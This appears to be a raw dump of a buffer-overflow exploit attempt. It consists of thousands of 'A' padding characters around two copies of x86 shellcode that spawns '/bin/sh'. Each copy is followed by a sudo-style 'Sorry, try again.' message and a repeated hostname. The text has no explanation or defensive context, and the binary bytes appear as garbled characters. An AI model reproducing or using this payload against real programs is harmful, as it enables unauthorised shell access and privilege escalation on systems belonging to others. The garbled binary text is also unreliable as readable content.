AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAë$^‰^ 3Ò‰V‰V¸45V4N ‹ÑÍ€3À@Í€è×ÿÿÿ/bin/shAAAAAAAAAÿÿÿÿ?ëÿÿÿ´¡% Sorry, try again. urocomptonmachineeurocomptonmachineeurocomptonmachineeurocomptonmachineeurocomptonmachineAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAë$^‰^ 3Ò‰V‰V¸45V4N ‹ÑÍ€3À@Í€è×ÿÿÿ/bin/shAAAAAAAAAÿÿÿÿ?ëÿÿÿ´¡% Sorry, try again. urocomptonmachineeurocomptonmachineeurocomptonmachineeurocomptonmachineeurocomptonmachineAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA